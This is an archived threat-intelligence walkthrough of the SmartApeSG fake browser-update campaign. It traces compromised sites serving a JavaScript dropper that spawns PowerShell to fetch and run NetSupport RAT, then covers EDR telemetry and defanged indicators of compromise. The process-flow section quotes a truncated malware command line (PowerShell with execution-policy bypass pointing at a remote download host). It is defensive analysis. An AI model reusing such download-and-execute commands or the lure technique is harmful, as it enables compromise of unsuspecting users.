SmartApeSG walkthrough
By Jerome Segura
Published: 2024-06-11 · Archived: 2026-04-05 20:08:55 UTC
In this walkthrough, we test SmartApeSG, a malware campaign distributed via compromised sites.
SmartApeSG, tested on June 11, 2024
Distribution
Social engineering attacks via fake browser updates are increasingly common. Criminals inject code into
compromised websites, which then present unsuspecting website users with malware downloads disguised as
browser updates. With little effort, threat actors can trick victims into executing malicious code and gain initial
access to their machines.
About one year ago, a new social engineering variant joined the fake browser updates club. We named it
SmartApeSG (AKA ZPHP, HANEYMANEY) in reference to its hosting provider (SmartApe) and of course
SocGholish which started it all. Like its counterparts, it leverages compromised websites to load a fake browser
update template. Victims are tricked into executing a file that will eventually download NetSupport RAT.
To start replaying this threat, we looked for previous indicators of compromise, in particular one of the domains
that is being injected into legitimate websites. To change things up a little bit, we set Microsoft Edge as our default
browser and visited one of those sites. After a few seconds, the page was hijacked and replaced with the following
template:
https://www.threatdown.com/blog/smartapesg-06-11-2024/
Page 1 of 12

The overlay reads “You are using an older version of Edge” (that template is adapted based on your browser). It
looks real, so much so that users will want to do the right thing and download this update.
Article continues below this ad.
When we click on the ‘Update Edge’ button, it downloads a zip archive with the following naming convention:
Update – [0-9]{5}.zip. After we extract the content of that archive, we see a main JavaScript file that has the static
name Update 124.0.6367.158.js (at least for the current campaign) and a folder called Install, itself containing
numerous ‘.dat’ files.
The file that victims will run is the JavaScript one, the others are there just for noise and to confuse security
products. If you were to look at that file (it is over 20MB), you wouldn’t see a lot other than what appears to be a
https://www.threatdown.com/blog/smartapesg-06-11-2024/
Page 2 of 12

legitimate library:
There is malicious code in there, which we will cover a little bit later. For now, we simply execute the script by
double-clicking on it. Not much actually happens, no installer screen or message indicating that the browser has
been updated. If you reload the website you are on, it will display normally this time, which is perhaps enough of
a trick.
Process flow
In the background, the script spawns a new PowerShell command responsible for downloading and executing the
payload as client32.exe (NetSupport RAT):
"C:\Windows\System32\WScript.exe" "C:\Users\admin\Downloads\Update 124.0.6367.158.js"
 "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $YLHTCF='http://ps
 "C:\Users\admin\AppData\Roaming\OAPWDYLP10\client32.exe"
This process flow is not exactly showing us what happens when we execute the malicious JavaScript. If we look
at the network activity (more on this in the next section), we see that wscript.exe is contacting the same remote
domain that served the template at the following URL: elvesofiax[.]com/cdn-vs/22per.php?[4digitid]
https://www.threatdown.com/blog/smartapesg-06-11-2024/
Page 3 of 12

The server sends back a response that is 7.9MB. If we open in a text editor, it looks like the same library we had
from earlier, but with a notable difference: At the very end of the file is a gigantic blurb of encoded data:
This is interesting because it means the original script (Update 124.0.6367.158.js) was just setting the stage and
this second one is the one that actually contains the malicious instructions. Using an online deobfuscator, we can
now expose the PowerShell command:
https://www.threatdown.com/blog/smartapesg-06-11-2024/
Page 4 of 12

The next steps in the infection process are for PowerShell to retrieve the final payload (NetSupport RAT) from the
remote host psk777[.]casa:
This time we get a giant (10.1MB) Base64 encoded string that decodes to a zip archive. These are the NetSupport
RAT files:
https://www.threatdown.com/blog/smartapesg-06-11-2024/
Page 5 of 12

Network summary
SmartApeSG network traffic captured by mitmproxy, rules from fiddleitm:
Post execution traffic (Wireshark):
Protection
When we first executed this payload, ThreatDown was already blocking the malicious domain hosting the fake
template and the NetSupport RAT payload:
https://www.threatdown.com/blog/smartapesg-06-11-2024/
Page 6 of 12

In order to see what EDR would record, we disabled all protections to let the attack happen without any
impediments. The process graph summarizes the events that happened on the victim’s endpoint. In this case, we
ran the script directly from the Downloads folder and let execution happen:
These are the events that were captured:
JavasScript execution:
https://www.threatdown.com/blog/smartapesg-06-11-2024/
Page 7 of 12

PowerShell execution:
https://www.threatdown.com/blog/smartapesg-06-11-2024/
Page 8 of 12

NetSupport RAT downloaded and runs from folder within %appdata%:
https://www.threatdown.com/blog/smartapesg-06-11-2024/
Page 9 of 12

Persistence achieved via an autorun registry key:
https://www.threatdown.com/blog/smartapesg-06-11-2024/
Page 10 of 12

Mitigations
We did not run the payload long enough to see what happens next, but it is likely that the infected endpoint would
be remotely accessed by a malicious actor for further assessment.
It was interesting to see how the threat actors were using a two stage scripting flow to invoke PowerShell. This
gives them more flexibility to change their payload’s location, as well as possibly bypass detection from security
engines.
A solid network-based defense will keep SmartApeSG away from your users, and EDR will also give you great
visibility into the attack chain. Finally, it’s important to remember that these incidents are often the precursor to
data theft or ransomware.
Did you like this walkthough? For more, check out our index page here.
Indicators of Compromise (IOCs)
Sample
4cf69758cb191de3edc2030019c3bb0c56346de4e85b6badcce9aba8a23706fa
https://www.threatdown.com/blog/smartapesg-06-11-2024/
Page 11 of 12

SmartApeSG infrastructure (now on Stark Industries)
elvesofiax[.]com
45.150.65[.]147
Second JavaScript
elvesofiax[.]com/cdn-vs/22per.php
NetSupport RAT host
psk777[.]casa
NetSupport RAT C2
94.158.245[.]103
Source: https://www.threatdown.com/blog/smartapesg-06-11-2024/
https://www.threatdown.com/blog/smartapesg-06-11-2024/
Page 12 of 12